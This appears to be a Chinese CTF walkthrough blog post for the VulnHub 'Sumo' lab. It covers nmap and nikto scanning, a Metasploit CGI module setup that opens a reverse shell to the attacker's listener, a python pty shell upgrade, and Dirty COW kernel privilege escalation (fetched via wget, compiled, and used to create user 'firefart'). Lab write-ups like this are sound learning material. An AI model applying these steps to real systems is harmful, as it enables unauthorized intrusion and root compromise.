vulnhub靶场渗透sumo漏洞复现(脏牛漏洞)

  • 机器名称:Sumo_Sun*

  • 难度:初级

  • 测试:VMware Workstation 15.x Pro以上

  • 目标: 获取根外壳,即(root@localhost:~#),然后在 /root 下获取标志)。

  • 下载链接:https://download.vulnhub.com/sumo/Sumo.zip

1.内网渗透

先利用namp扫描整个网段,找出靶机的IP为192.168.179.117

image-20230809155403000

2.端口扫描

扫描所有开放的端口,找出的开放端口为80,22

image-20230809155450054

根据对应的端口,找到可能存在的漏洞,没发现漏洞

 nmap --script=vuln -p80 192.168.179.117

image-20230809155531743

3.扫描指纹

要下载插件扫描指纹信息,用kali自带的whatweb插件,apache版本为2.2.22

image-20230809155642489

4.目录扫描

通过dirb遍历一下其可能存在的站点,发现了三个站点,但是排查完发现没什么用

image-20230809160152237

5.漏洞扫描

nikto 扫描网站漏洞,发现了一个漏洞

 nikto -h http://192.168.179.117

image-20230809155956649

用msf查找一下漏洞,发现有几个模块可以利用

image-20230809160339597

设置参数,利用模块进行攻击,需要设置的参数

 set rhosts 192.168.179.117(目标主机)
 set TARGETURI /cgi-bin/test
 set lhost 192.168.179.131(本机)
 set lport 4444(监听端口)

image-20230809160707154

设置完参数后run进行攻击,如图说明攻击成功,当前账户为www-data,由于没有回显,利用python构造一个回显

 python -c 'import pty; pty.spawn("/bin/bash")'

image-20230809160937185

6.漏洞提权

Ubuntu12.04 可以使用脏牛进行内核提权,searchsploit查找dirtycow漏洞,将漏洞源码40839.c复制到当前的文件夹下

image-20230809163416647

将40839.c重命名dirty.c到html目录下,开启apache2功能,目的是让攻击机能够下载dirty.c

image-20230809163723324

在攻击机上通过wget下载dirty.c,然后给文件提权

image-20230809164236591

使用 GCC 编译器编译名为 "dirty.c" 的源代码文件,并生成可执行文件 "dirty",执行文件dirty,密码设置为123456,用户名为firefart

image-20230809164519856

切换到firefart用户下,密码为123456,然后切换到主目录下,ls发现文件root.txt,cat一下发现flag

image-20230809165441807

7.总结

该漏洞环境主要是复现脏牛漏洞dirty cow,先通过msf查找漏洞后进行利用,再用dirty cow进行提权

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值